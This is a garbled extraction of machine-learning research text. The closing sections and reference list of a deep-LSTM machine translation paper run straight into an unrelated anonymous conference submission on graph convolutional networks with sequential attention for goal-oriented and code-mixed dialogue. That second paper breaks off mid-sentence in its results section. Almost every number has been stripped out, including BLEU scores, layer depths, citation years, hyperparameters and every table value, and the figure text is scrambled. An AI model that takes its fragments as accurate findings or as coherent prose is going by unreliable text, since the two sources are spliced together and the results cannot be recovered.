over-fitting deep models have more parameters, and thus have a stronger ability to fit the large data set. however, our experimental results suggest that deep models are less prone to the problem of over-fitting. in fig. , we show three results from models with a different depth on the english-to-french task. these three models are evaluated by token error rate, which is defined as the ratio of incorrectly predicted words in the whole target sequence with correct his- torical input. the curve with square marks corre- sponds to deep-att with ne = and nd = . the curve with circle marks corresponds to ne = and nd = . the curve with triangle marks corresponds to ne = and nd = . we find that the deep model has better performance on the test set when the token error rate is the same as that of the shallow models on the training set. this shows that, with decreased token error rate, the deep model is more advanta- geous in avoiding the over-fitting phenomenon. we only plot the early training stage curves because, during the late training stage, the curves are not smooth. conclusion with the introduction of fast-forward connections to the deep lstm network, we build a fast path with neither non-linear transformations nor recur- rent computation to propagate the gradients from the top to the deep bottom. on this path, gradients de- cay much slower compared to the standard deep net- work. this enables us to build the deep topology of nmt models. we trained nmt models with depth of in- cluding lstm layers and evaluated them mainly on the wmt’ english-to-french translation task. this is the deepest topology that has been in- vestigated in the nmt area on this task. we showed that our deep-att exhibits . bleu points improvement over the previous best single model, achieving a . bleu score. this single end-to- end nmt model outperforms the best conventional smt system (durrani et al., ) and achieves a state-of-the-art performance. after utilizing un- known word processing and model ensemble of three models, we obtained a bleu score of . , an improvement of . bleu points over the pre- vious best result. when evaluated on the subset of the test corpus without unknown words, our model achieves . . our model is also validated on the more difficult english-to-german task. our model is also efficient in sequence genera- tion. the best results from both a single model and model ensemble are obtained with a beam size of , much smaller than previous nmt systems where beam size is about (jean et al., ; sutskever et al., ). from our analysis, we find that deep models are more advantageous for learning for long sequences and that the deep topology is resistant to the over-fitting problem. we tried deeper models and did not obtain further improvements with our current topology and train- ing techniques. however, the depth of is not very deep compared to the models in computer vi- sion (he et al., ). we believe we can benefit from deeper models, with new designs of topologies and training techniques, which remain as our future work. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of in- ternational conference on learning representations. yoshua bengio, patrice simard, and paolo frasconi. . learning long-term dependencies with gradi- ent descent is difficult. ieee transactions on neural networks, ( ): – . yoshua bengio, . practical recommendations for gradient-based training of deep architectures, pages – . 
springer berlin heidelberg, berlin, heidel- berg. christian buck, kenneth heafield, and bas van ooyen. . n-gram counts and language models from the common crawl. in proceedings of the language re- sources and evaluation conference. kyunghyun cho, bart van merrienboer, caglar gulcehre, fethi bougares, holger schwenk, and yoshua ben- gio. . learning phrase representations using rnn encoder-decoder for statistical machine transla- tion. in proceedings of the empiricial methods in nat- ural language processing. nadir durrani, barry haddow, philipp koehn, and ken- neth heafield. . edinburgh’s phrase-based ma- chine translation systems for wmt- . in proceed- ings of the ninth workshop on statistical machine translation. mikel l. forcada and ramón p. ñeco. . recur- sive hetero-associative memories for translation. in biological and artificial computation: from neuro- science to technology, berlin, heidelberg. springer berlin heidelberg. alex graves, marcus liwicki, santiago fernandez, ro- man bertolami, horst bunke, and jürgen schmid- huber. . a novel connectionist system for un- constrained handwriting recognition. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . kaiming he, xiangyu zhang, shaoqing ren, and jian sun. . deep residual learning for image recog- nition. in ieee conference on computer vision and pattern recognition. karl moritz hermann, tomáš kočiský, edward grefen- stette, lasse espeholt, will kay, mustafa suleyman, and phil blunsom. . teaching machines to read and comprehend. in advances in neural information processing systems. geoffrey e. hinton, nitish srivastava, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . im- proving neural networks by preventing co-adaptation of feature detectors. arxiv: . . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in proceed- ings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing. nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in proceedings of the empirical methods in natural language processing. nal kalchbrenner, ivo danihelka, and alex graves. . grid long short-term memory. in proceedings of international conference on learning representa- tions. diederik p. kingma and jimmy lei ba. . adam: a method for stochastic optimization. in proceedings of international conference on learning representa- tions. p. koehn, f. j. och, and d. marcu. . statistical phrase-based translation. in proceedings of the north american chapter of the association for computa- tional linguistics on human language technology. yann lecun, léon bottou, yoshua bengio, and patrick haffner. . gradient-based learning applied to document recognition. proceedings of the ieee, ( ): – . percy liang, ben taskar, and dan klein. . align- ment by agreement. in proceedings of the north american chapter of the association of computa- tional linguistics on human language technology. thang luong, ilya sutskever, quoc le, oriol vinyals, and wojciech zaremba. . addressing the rare word problem in neural machine translation. in pro- ceedings of the rd annual meeting of the associa- tion for computational linguistics and the th inter- national joint conference on natural language pro- cessing. 
junhua mao, wei xu, yi yang, jiang wang, zhiheng huang, and alan l. yuille. . deep captioning with multimodal recurrent neural networks (m-rnn). in proceedings of international conference on learn- ing representations. holger schwenk. . http://www-lium.univ- lemans.fr/∼schwenk/cslm joint paper [online; ac- cessed -september- ]. university le mans. rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. . highway networks. in proceed- ings of the nd international conference on machine learning, deep learning workshop. ilya sutskever, oriol vinyals, and quoc le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems. christian szegedy, wei liu, yangqing jia, pierre ser- manet, scott reed, dragomir anguelov, dumitru er- han, vincent vanhoucke, and andrew rabinovich. . going deeper with convolutions. in ieee con- ference on computer vision and pattern recognition. tijmen tieleman and geoffrey hinton. . lecture . -rmsprop: divide the gradient by a running aver- age of its recent magnitude. coursera: neural net- works for machine learning, . oriol vinyals and quoc le. . a neural conver- sational model. in proceedings of the nd interna- tional conference on machine learning, deep learn- ing workshop. kaisheng yao, trevor cohn, katerina vylomova, kevin duh, and chris dyer. . depth-gated lstm. arxiv: . . yang yu, wei zhang, chung-wei hang, bing xiang, and bowen zhou. . empirical study on deep learning models for qa. arxiv: . . matthew d. zeiler. . adadelta: an adaptive learning rate method. arxiv: . . jie zhou and wei xu. . end-to-end learning of se- mantic role labeling using recurrent neural networks. in proceedings of the rd annual meeting of the as- sociation for computational linguistics and the th international joint conference on natural language processing. under review as a conference paper at iclr graph convolutional network with sequen- tial attention for goal-oriented dialogue systems anonymous authors paper under double-blind review abstract domain specific goal-oriented dialogue systems typically require modeling three types of inputs, viz., (i) the knowledge-base associated with the domain, (ii) the history of the conversation, which is a sequence of utterances and (iii) the cur- rent utterance for which the response needs to be generated. while modeling these inputs, current state-of-the-art models such as mem seq typically ignore the rich structure inherent in the knowledge graph and the sentences in the con- versation context. inspired by the recent success of structure-aware graph con- volutional networks (gcns) for various nlp tasks such as machine translation, semantic role labeling and document dating, we propose a memory augmented gcn for goal-oriented dialogues. our model exploits (i) the entity relation graph in a knowledge-base and (ii) the dependency graph associated with an utterance to compute richer representations for words and entities. further, we take cog- nizance of the fact that in certain situations, such as, when the conversation is in a code-mixed language, dependency parsers may not be available. we show that in such situations we could use the global word co-occurrence graph and use it to enrich the representations of utterances. we experiment with the modified dstc dataset and its recently released code-mixed versions in four languages and show that our method outperforms existing state-of-the-art methods, using a wide range of evaluation metrics. 
introduction goal-oriented dialogue systems which can assist humans in various day-to-day activities have widespread applications in several domains such as e-commerce, entertainment, healthcare, etc. for example, such systems can help humans in scheduling medical appointments, reserving restaurants, booking tickets, etc.. from a modeling perspective, one clear advantage of dealing with domain spe- cific goal-oriented dialogues is that the vocabulary is typically limited, the utterances largely follow a fixed set of templates and there is an associated domain knowledge which can be exploited. more specifically, there is some structure associated with the utterances as well as the knowledge base. more formally, the task here is to generate the next response given (i) the previous utterances in the conversation history (ii) the current user utterance (known as the query) and (iii) the entities and relationships in the associated knowledge base. current state-of-the-art methods (seo et al., ; eric & manning, ; madotto et al., ) typically use variants of recurrent neural network (elman, ) to encode the history and current utterance and an external memory network to store the entities in the knowledge base. the encodings of the utterances and memory elements are then suitably combined using an attention network and fed to the decoder to generate the response, one word at a time. however, these methods do not exploit the structure in the knowledge base as defined by entity-entity relations and the structure in the utterances as defined by a dependency parse. such structural information can be exploited to improve the performance of the system as demonstrated by recent works on syntax-aware neural machine translation (eriguchi et al., ; bastings et al., ; chen et al., ), semantic role labeling (marcheggiani & titov, ) and document dating under review as a conference paper at iclr (vashishth et al., ) which use gcns (defferrard et al., ; duvenaud et al., ; kipf & welling, ) to exploit sentence structure. in this work, we propose to use such graph structures for goal-oriented dialogues. in particular, we compute the dependency parse tree for each utterance in the conversation and use a gcn to capture the interactions between words. this allows us to capture interactions between distant words in the sentence as long as they are connected by a dependency relation. we also use gcns to encode the entities of the kb where the entities are treated as nodes and the relations as edges of the graph. once we have a richer structure aware representation for the utterances and the entities, we use a sequential attention mechanism to compute an aggregated context representation from the gcn node vectors of the query, history and entities. further, we note that in certain situations, such as, when the conversation is in a code-mixed language or a language for which parsers are not available then it may not be possible to construct a dependency parse for the utterances. to overcome this, we construct a co-occurrence matrix from the entire corpus and use this matrix to impose a graph structure on the utterances. more specifically, we add an edge between two words in a sentence if they co-occur frequently in the corpus. our experiments suggest that this simple strategy acts as a reasonable substitute for dependency parse trees. we perform experiments with the modified dstc (bordes et al., ) dataset which contains goal-oriented conversations for reserving restaurants. 
we also use its recently released code-mixed versions (banerjee et al., ) which contain code-mixed conversations in four different languages, viz., hindi, bengali, gujarati and tamil. we compare with recent state-of-the-art methods and show that on average the proposed model gives an improvement of . bleu points and rouge points. our contributions can be summarized as follows: (i) we use gcns to incorporate structural in- formation for encoding query, history and kb entities in goal-oriented dialogues (ii) we use a se- quential attention mechanism to obtain query aware and history aware context representations (iii) we leverage co-occurrence frequencies and ppmi (positive-pointwise mutual information) values to construct contextual graphs for code-mixed utterances and (iv) we show that the proposed model obtains state-of-the-art results on the modified dstc dataset and its recently released code-mixed versions. related work in this section we review the previous work in goal-oriented dialogue systems and describe the introduction of gcns in nlp. goal-oriented dialogue system : initial goal-oriented dialogue systems (young, ; williams & young, ) were based on dialogue state tracking (williams et al., ; henderson et al., a;b) and included pipelined modules for natural language understanding, dialogue state track- ing, policy management and natural language generation. wen et al. ( ) used neural networks for these intermediate modules but still lacked absolute end-to-end trainability. such pipelined modules were restricted by the fixed slot-structure assumptions on the dialogue state and required per-module based labelling. to mitigate this problem bordes et al. ( ) released a version of goal-oriented dialogue dataset that focuses on the development of end-to-end neural models. such models need to reason over the associated kb triples and generate responses directly from the utterances without any additional annotations. for example, bordes et al. ( ) proposed a memory network (sukhbaatar et al., ) based model to match the response candidates with the multi-hop attention weighted representation of the conversation history and the kb triples in memory. liu & perez ( ) further added highway (srivastava et al., ) and residual connections (he et al., ) to the memory network in order to regulate the access to the memory blocks. seo et al. ( ) developed a variant of rnn cell which computes a refined representation of the query over multiple iterations before querying the memory. however, all these approaches retrieve the response from a set of candidate responses and such a candidate set is not easy to obtain in any new domain of interest. to account for this, eric & manning ( ); zhao et al. ( ) adapted rnn based encoder-decoder models to generate appropriate responses instead of retrieving them from a candidate set. eric et al. ( ) introduced a key-value memory network based generative model which integrates the underlying kb with rnn based encode-attend-decode models. madotto et al. ( ) used memory networks on top of the rnn decoder to tightly integrate kb entities with the decoder to generate more infor- under review as a conference paper at iclr mative responses. however, as opposed to our work, all these works ignore the underlying structure of the entity-relation graph of the kb and the syntactic structure of the utterances. 
gcns in nlp : recently, there has been an active interest in enriching existing encode-attend- decode models (bahdanau et al., ) with structural information for various nlp tasks. such structure is typically obtained from the constituency and/or dependency parse of sentences. the idea is to treat the output of a parser as a graph and use an appropriate network to capture the interactions between the nodes of this graph. for example, eriguchi et al. ( ) and chen et al. ( ) showed that incorporating such syntactical structures as tree-lstms in the encoder can improve the per- formance of neural machine translation (nmt). peng et al. ( ) use graph-lstms to perform cross sentence n-ary relation extraction and show that their formulation is applicable to any graph structure and tree-lstms can be thought of as a special case of it. in parallel, graph convolutional networks (gcns) (duvenaud et al., ; defferrard et al., ; kipf & welling, ) and their variants (li et al., ) have emerged as state-of-the-art methods for computing representations of entities in a knowledge graph. they provide a more flexible way of encoding such graph structures by capturing multi-hop relationships between nodes. this has led to their adoption for various nlp tasks such as neural machine translation (marcheggiani et al., ; bastings et al., ), semantic role labeling (marcheggiani & titov, ), document dating (vashishth et al., ) and question answering (johnson, ; nicola de cao, ). to the best of our knowledge ours is the first work that uses gcns to incorporate dependency struc- tural information and the entity-entity graph structure in a single end-to-end neural model for goal- oriented dialogue. this is also the first work that incorporates contextual co-occurrence information for code-mixed utterances, for which no dependency structures are available. background in this section we describe graph convolutional networks (gcn) (kipf & welling, ) for undi- rected graphs and then describe their syntactic versions which work with directed labeled edges of dependency parse trees. . gcn for undirected graphs graph convolutional networks operate on a graph structure and compute representations for the nodes of the graph by looking at the neighbourhood of the node. k layers of gcns can be stacked to account for neighbours which are k-hops away from the current node. formally, let g = (v,e) be an undirected graph where v is the set of nodes (let |v| = n) and e is the set of edges. let x ∈ rn×m be the input feature matrix with n nodes and each node xu(u ∈ v) is represented by an m-dimensional feature vector. the output of a -layer gcn is the hidden representation matrix h ∈ rn×d where each d-dimensional representation of a node captures the interactions with its -hop neighbour. each row of this matrix can be computed as: hv = relu ( ∑ u∈n(v) (wxu + b) ) , ∀v ∈v ( ) here w ∈ rd×m is the model parameter matrix, b ∈ rd is the bias vector and relu is the rectified linear unit activation function. n(v) is the set of neighbours of node v and is assumed to also include the node v so that the previous representation of the node v is also considered while computing the new hidden representation. to capture interactions with nodes which are multiple hops away, multiple layers of gcns can be stacked together. specifically, the representation of node v after kth gcn layer can be formulated as: hk+ v = relu ( ∑ u∈n(v) (wkhku + b k) ) , ∀v ∈v ( ) where hku is the representation of the u th node in the (k − )th gcn layer and h u = xu. 
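A single hop of the undirected GCN described above can be written in a few lines. This is a minimal NumPy sketch, not a reference implementation; the toy graph, sizes and initialisation are assumptions. Each node sums a shared linear transformation of its neighbours' features (with the node itself included in its own neighbourhood) and applies a ReLU; stacking the layer k times lets information travel k hops.

```python
import numpy as np

def gcn_layer(X, neighbors, W, b):
    """One GCN hop: h_v = ReLU( sum_{u in N(v)} (W x_u + b) ).

    X         : (n, m) input node features
    neighbors : list of neighbour index lists, with v included in N(v)
    W, b      : shared weight matrix (d, m) and bias (d,)
    """
    H = np.zeros((X.shape[0], W.shape[0]))
    for v, nbrs in enumerate(neighbors):
        H[v] = sum(W @ X[u] + b for u in nbrs)
    return np.maximum(H, 0.0)                    # ReLU

rng = np.random.default_rng(0)
n, m, d = 4, 6, 5                                # toy sizes (assumptions)
X = rng.standard_normal((n, m))
# toy undirected chain 0-1, 1-2, 2-3, with each node included in its own neighbourhood
neighbors = [[0, 1], [0, 1, 2], [1, 2, 3], [2, 3]]

H = X
for k in range(2):                               # stack two hops (2-hop neighbourhoods)
    W = rng.standard_normal((d, H.shape[1])) * 0.1
    b = np.zeros(d)
    H = gcn_layer(H, neighbors, W, b)
print(H.shape)                                   # (4, 5)
```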
Syntactic GCN

In a directed labeled graph $G = (V, E)$, each edge between nodes $u$ and $v$ is represented by a triple $(u, v, L(u,v))$, where $L(u,v)$ is the associated edge label. Marcheggiani & Titov ( ) modified GCNs to operate over directed labeled graphs, such as the dependency parse tree of a sentence. For such a tree, in order to allow information to flow from head to dependents and vice versa, they added inverse dependency edges from dependents to heads, such as $(v, u, L(u,v)')$, to $E$ and made the model parameters and biases label specific. In their formulation,

$$h^{k+1}_v = \mathrm{ReLU}\Big(\sum_{u \in \mathcal{N}(v)} (W^{k}_{L(u,v)} h^{k}_u + b^{k}_{L(u,v)})\Big), \quad \forall v \in V$$

Notice that, unlike the undirected formulation above, this equation has parameters $W^{k}_{L(u,v)}$ and $b^{k}_{L(u,v)}$ which are label specific. Suppose there are $L$ different labels; then this formulation requires $L$ weights and biases per GCN layer, resulting in a large number of parameters. To avoid this, the authors use only three sets of weights and biases per GCN layer (as opposed to $L$), depending on the direction in which the information flows. More specifically, $W^{k}_{L(u,v)} = W^{k}_{dir(u,v)}$, where $dir(u,v)$ indicates whether information flows from $u$ to $v$, from $v$ to $u$, or $u = v$. In this work, we also set $b^{k}_{L(u,v)} = b^{k}_{dir(u,v)}$ instead of having a separate bias per label. The final GCN formulation can thus be described as:

$$h^{k+1}_v = \mathrm{ReLU}\Big(\sum_{u \in \mathcal{N}(v)} (W^{k}_{dir(u,v)} h^{k}_u + b^{k}_{dir(u,v)})\Big), \quad \forall v \in V$$

Model

We first formally define the task of end-to-end goal-oriented dialogue generation. Each dialogue of $T$ turns can be viewed as a succession of user utterances ($U$) and system responses ($S$), represented as $(U_1, S_1, U_2, S_2, \ldots, U_T, S_T)$. Along with these utterances, each dialogue is also accompanied by $e$ KB triples which are relevant to that dialogue, represented as $(k_1, k_2, k_3, \ldots, k_e)$. Each triple is of the form (entity$_1$, relation, entity$_2$). These triples can be represented in the form of a graph $G_K = (V_K, E_K)$, where $V_K$ is the set of all entities and each edge in $E_K$ is of the form (entity$_1$, entity$_2$, relation), where the relation signifies the edge label. At any dialogue turn $i$, given (i) the dialogue history $H = (U_1, S_1, U_2, \ldots, S_{i-1})$, (ii) the current user utterance as the query $Q = U_i$ and (iii) the associated knowledge graph $G_K$, the task is to generate the current response $S_i$ which leads to a completion of the goal. As mentioned earlier, we exploit the graph structure in the KB and the syntactic structure in the utterances to generate appropriate responses. Towards this end we propose a model with the following components for encoding these three types of inputs.

Query encoder

The query $Q = U_i$ is the $i$-th (current) utterance in the dialogue and contains $|Q|$ tokens. We denote the embedding of the $i$-th token in the query as $q_i$. We first compute the contextual representations of these tokens by passing them through a bidirectional RNN:

$$b_t = \mathrm{BiRNN}_Q(b_{t-1}, q_t)$$

Now, consider the dependency parse tree of the query sentence, denoted by $G_Q = (V_Q, E_Q)$. We use a query-specific GCN to operate on $G_Q$, which takes $\{b_i\}_{i=1}^{|Q|}$ as the input to the 1st GCN layer. The node representation in the $k$-th hop of the query-specific GCN is computed as:

$$c^{k+1}_v = \mathrm{ReLU}\Big(\sum_{u \in \mathcal{N}(v)} (W^{k}_{dir(u,v)} c^{k}_u + g^{k}_{dir(u,v)})\Big), \quad \forall v \in V_Q$$

where $W^{k}_{dir(u,v)}$ and $g^{k}_{dir(u,v)}$ are edge-direction-specific query-GCN weights and biases for the $k$-th hop and $c^{1}_u = b_u$.
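The direction-specific hop above can be sketched as follows, assuming edges are supplied as (u, v, direction) triples with direction in {"out", "in", "self"}; the function and parameter names are illustrative, not the authors' implementation.

```python
import numpy as np

def relu(x):
    return np.maximum(x, 0.0)

def directional_gcn_hop(H, edges, W_dir, b_dir):
    """One direction-specific GCN hop:
    h_v^{k+1} = ReLU(sum over (u, v) of (W_dir(u,v) h_u^k + b_dir(u,v))).

    H     : (n, d_in) node representations from the previous hop
    edges : list of (u, v, direction); "out" for dependency edges,
            "in" for the added inverse edges, "self" for self loops
    W_dir : dict direction -> (d_out, d_in) weight matrix
    b_dir : dict direction -> (d_out,) bias vector
    """
    n = H.shape[0]
    d_out = next(iter(W_dir.values())).shape[0]
    out = np.zeros((n, d_out))
    for u, v, direction in edges:
        out[v] += W_dir[direction] @ H[u] + b_dir[direction]
    return relu(out)
```

In the model described next, the query, history and KB encoders each instantiate such a hop with their own parameter sets ($W$/$g$, $V$/$o$ and $U$/$z$ respectively), differing only in the graph they operate on.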
[Figure 1: Illustration of the GCN (a) and RNN+GCN (b) modules which are used as encoders in our model, shown over the example sentence "Hello, welcome to the Cambridge restaurant system" with graph convolution connections, dependency parse edges and self-loop connections. The notation is specific to the dialogue history encoder, but both encoders are the same for the query; the GCN encoder is the same for the KB except for the graph structure.]

Dialogue history encoder

The history $H$ of the dialogue contains $|H|$ tokens and we denote the embedding of the $i$-th token in the history by $p_i$. Once again, we first compute the hidden representations of these embeddings using a bidirectional RNN:

$$s_t = \mathrm{BiRNN}_H(s_{t-1}, p_t)$$

We now compute a dependency parse tree for each sentence in the history and collectively represent all the trees as a single graph $G_H = (V_H, E_H)$. Note that this graph will only contain edges between words belonging to the same sentence; there will be no edges between words across sentences. We then use a history-specific GCN to operate on $G_H$, which takes $s_t$ as the input to the 1st layer. The node representation in the $k$-th hop of the history-specific GCN is computed as:

$$a^{k+1}_v = \mathrm{ReLU}\Big(\sum_{u \in \mathcal{N}(v)} (V^{k}_{dir(u,v)} a^{k}_u + o^{k}_{dir(u,v)})\Big), \quad \forall v \in V_H$$

where $V^{k}_{dir(u,v)}$ and $o^{k}_{dir(u,v)}$ are edge-direction-specific history-GCN weights and biases in the $k$-th hop and $a^{1}_u = s_u$. Such an encoder with a single hop of GCN is illustrated in Figure 1(b) and the encoder without the BiRNN is depicted in Figure 1(a).

KB encoder

As mentioned earlier, $G_K = (V_K, E_K)$ is the graph capturing the interactions between the entities in the knowledge graph associated with the dialogue. Let there be $m$ such entities, and denote the embedding of the node corresponding to the $i$-th entity as $e_i$. We then operate a KB-specific GCN on these entity representations to obtain refined representations which capture the relations between entities. The node representation in the $k$-th hop of the KB-specific GCN is computed as:

$$r^{k+1}_v = \mathrm{ReLU}\Big(\sum_{u \in \mathcal{N}(v)} (U^{k}_{dir(u,v)} r^{k}_u + z^{k}_{dir(u,v)})\Big), \quad \forall v \in V_K$$

where $U^{k}_{dir(u,v)}$ and $z^{k}_{dir(u,v)}$ are edge-direction-specific KB-GCN weights and biases in the $k$-th hop and $r^{1}_u = e_u$. We also add inverse edges to $E_K$, similar to the case of syntactic GCNs, in order to allow information flow in both directions for an entity pair in the knowledge graph.

[Figure 2: Illustration of the sequential attention mechanism in RNN+GCN-SEA, showing the query, dialogue history and KB entity encoders, the attention weights $\alpha_{jt}$, $\beta_{jt}$, $\gamma_{jt}$, the aggregated context vectors $h^q_t$, $h^h_t$, $h^k_t$, and the decoder.]

Sequential attention

We use an RNN decoder to generate the tokens of the response, and let the hidden states of the decoder be denoted by $\{d_i\}_{i=1}^{T}$, where $T$ is the total number of decoder timesteps. In order to obtain a single representation from the final layer ($k = f$) of the query-GCN node vectors, we use an attention mechanism as described below:

$$\mu_{jt} = v_1^{\top}\tanh(W_1 c^{f}_j + W_2 d_{t-1})$$
$$\alpha_t = \mathrm{softmax}(\mu_t)$$
$$h^{q}_t = \sum_{j'=1}^{|Q|} \alpha_{j't}\, c^{f}_{j'}$$

Here $v_1$, $W_1$ and $W_2$ are parameters.
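A small sketch of this first attention step (attention over the final-layer query-GCN vectors, conditioned on the previous decoder state) is given below; shapes and names are assumptions made for illustration only. The same pattern is repeated in the following paragraphs for the history (further conditioned on $h^q_t$) and for the KB (conditioned on both $h^q_t$ and $h^h_t$), which is what makes the attention sequential.

```python
import numpy as np

def softmax(x):
    e = np.exp(x - x.max())
    return e / e.sum()

def query_attention(C_f, d_prev, v1, W1, W2):
    """Attend over final-layer query-GCN node vectors.

    C_f    : (|Q|, d) final-hop query-GCN representations c^f_j
    d_prev : (d_dec,) previous decoder state d_{t-1}
    v1     : (d_att,), W1 : (d_att, d), W2 : (d_att, d_dec)
    Returns the query context vector h^q_t and the attention weights alpha_t.
    """
    scores = np.array([v1 @ np.tanh(W1 @ c + W2 @ d_prev) for c in C_f])
    alpha = softmax(scores)
    h_q = alpha @ C_f          # weighted sum of node vectors
    return h_q, alpha
```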
Further, at each decoder timestep, we obtain a query-aware representation from the final layer of the history-GCN by computing an attention score for each node/token in the history based on the query context vector $h^q_t$, as shown below:

$$\nu_{jt} = v_2^{\top}\tanh(W_3 a^{f}_j + W_4 d_{t-1} + W_5 h^{q}_t)$$
$$\beta_t = \mathrm{softmax}(\nu_t)$$
$$h^{h}_t = \sum_{j'=1}^{|H|} \beta_{j't}\, a^{f}_{j'}$$

Here $v_2$, $W_3$, $W_4$ and $W_5$ are parameters. Finally, we obtain a query- and history-aware representation of the KB by computing an attention score over all the nodes in the final layer of the KB-GCN, using $h^q_t$ and $h^h_t$, as shown below:

$$\omega_{jt} = v_3^{\top}\tanh(W_6 r^{f}_j + W_7 d_{t-1} + W_8 h^{q}_t + W_9 h^{h}_t)$$
$$\gamma_t = \mathrm{softmax}(\omega_t)$$
$$h^{k}_t = \sum_{j'=1}^{m} \gamma_{j't}\, r^{f}_{j'}$$

Here $v_3$, $W_6$, $W_7$, $W_8$ and $W_9$ are parameters. This sequential attention mechanism is illustrated in Figure 2. For simplicity, we depict the GCN and RNN+GCN encoders as blocks; the internal structure of these blocks is shown in Figure 1.

Decoder

The decoder takes two inputs, viz., (i) the context, which contains the history and the KB, and (ii) the query, which is the last/previous utterance in the dialogue. We use an aggregator which learns the overall attention to be given to the history and KB components. These attention scores, $\theta^h_t$ and $\theta^k_t$, depend on the respective context vectors and the previous decoder state $d_{t-1}$. The final context vector is obtained as:

$$h^{c}_t = \theta^{h}_t h^{h}_t + \theta^{k}_t h^{k}_t$$
$$h^{final}_t = [h^{c}_t ; h^{q}_t]$$

where $[;]$ denotes the concatenation operator. At every timestep the decoder then computes a probability distribution over the vocabulary using the following equations:

$$d_t = \mathrm{RNN}(d_{t-1}, [h^{final}_t ; w_t])$$
$$P_{vocab} = \mathrm{softmax}(V' d_t + b')$$

where $w_t$ is the decoder input at time step $t$, and $V'$ and $b'$ are parameters. $P_{vocab}$ gives us a probability distribution over the entire vocabulary, and the loss for time step $t$ is $L_t = -\log P_{vocab}(w^{*}_t)$, where $w^{*}_t$ is the $t$-th word in the ground-truth response. The total loss is the average of the per-timestep losses.

Contextual graph creation

For the dialogue history and query encoders, we used the dependency parse tree to capture structural information in the encodings. However, if the conversations occur in a language for which no dependency parser exists, for example code-mixed languages like Hinglish (Hindi-English) (Banerjee et al., ), then we need an alternative way of extracting a graph structure from the utterances. One simple solution which worked well in practice was to create a word co-occurrence matrix from the entire corpus, where the context window is an entire sentence. Once we have such a co-occurrence matrix, for a given sentence we can connect an edge between two words if their co-occurrence value is above a threshold. The co-occurrence matrix can either contain raw co-occurrence frequency counts or positive pointwise mutual information (PPMI) values (Church & Hanks, ; Dagan et al., ; Niwa & Nitta, ).

Experimental setup

In this section we describe the datasets used in our experiments, the various hyperparameters that we considered and the models that we compared.

Datasets

The original DSTC2 dataset (Henderson et al., a) was based on the task of restaurant reservation and contains transcripts of real conversations between humans and bots. The utterances were labeled with dialogue state annotations such as the semantic intent representation, the requested slots and the constraints on the slot values. We report our results on the modified DSTC2 dataset of Bordes et al.
( ) where such annotations are removed and only the raw utterance-response pairs are present with an associated set of kb triples for each dialogue. for our experiments with contextual graphs we reported our results on the code-mixed versions of modified dstc , which was recently released by banerjee et al. ( ) . this dataset has been collected by code-mixing the utterances of the english version of modified dstc in four languages viz. hindi (hi-dstc ), bengali (be-dstc ), gujarati (gu-dstc ) and tamil (ta-dstc ), via crowdsourcing. statistics about this dataset and example dialogues are shown in appendix a. https://github.com/sumanbanerjee /code-mixed-dialog https://github.com/sumanbanerjee /code-mixed-dialog under review as a conference paper at iclr model per-resp.acc bleu rouge entity f l rule-based (bordes et al., ) . - - - - - memnn (bordes et al., ) . - - - - - qrn (seo et al., ) . - - - - - gmemnn (liu & perez, ) . - - - - - seq seq-attn (bahdanau et al., ) . . . . . . seq seq-attn+copy (eric & manning, ) . . - - - . hred (serban et al., ) . . . . . . mem seq (madotto et al., ) . . - - - . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . table : comparison of gcn-sea with other models on english version of modified dstc dataset model per-resp.acc bleu rouge entity f l hi-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . be-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . gu-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . ta-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . table : comparison of rnn+gcn-sea, gcn-sea with other models on all code-mixed datasets . hyperparameters we used the same train, test and validation splits as provided in the original versions of the datasets. we minimized the cross entropy loss using the adam optimizer (kingma & ba, ) and tuned the initial learning rates in the range of . to . . for regularization we used an l norm of . in addition to a dropout (srivastava et al., ) of . . we used randomly initialized word embeddings of size . the rnn and gcn hidden dimensions were also chosen to be . we use gru (cho et al., ) cells for the rnns. all parameters were initialized from a truncated normal distribution with a standard deviation of . . . models compared we compare the performance of the following models. under review as a conference paper at iclr (i) rnn+gcn-sea vs gcn-sea : we use rnn+gcn-sea to refer to the model described in section . instead of using the hidden representations obtained from the bidirectional rnns, we also experiment by providing the token embeddings directly to the gcns i.e. c u = qu in equation and a u = pu in equation . we refer to this model as gcn-sea. (ii) cross edges between the gcns: in addition to the dependency and contextual edges, we add edges between words in the dialogue history/query and kb entities if a history/query word exactly matches the kb entity. such edges create a single connected graph which is encoded using a single gcn encoder and then separated into different contexts to perform the sequential attention. this model is referred to as rnn+cross-gcn-sea. 
(iii) frequency vs ppmi contextual graph : we experiment with the raw frequency co- occurrence graph structure and the ppmi graph structure for the code-mixed datasets, as explained in section . . we refer to these models as gcn-sea+freq and gcn-sea+ppmi. in both these models, the gcn takes inputs from a bidirectional rnn. (iv) gcn-sea+random vs gcn-sea+structure : we experiment with the model where the graph is constructed by randomly connecting edges between two words in a context. we refer to this model as gcn-sea+random. we refer to the model which either uses dependency or contextual graph instead of random graphs as gcn-sea+structure. results and discussions in this section we discuss the results of our experiments as summarized in tables , , and . we use bleu (papineni et al., ) and rouge (lin, ) metrics to evaluate the generation quality of responses. we also report the per-response accuracy which computes the percentage of responses in which the generated response exactly matches the ground truth response. in order to evaluate the model’s capability of correctly injecting entities in the generated response, we report the entity f measure as defined in eric & manning ( ). results on en-dstc : we compare our model with the previous works on the english version of modified dstc in table . for most of the retrieval based models, the bleu or rouge scores are not available as they select a 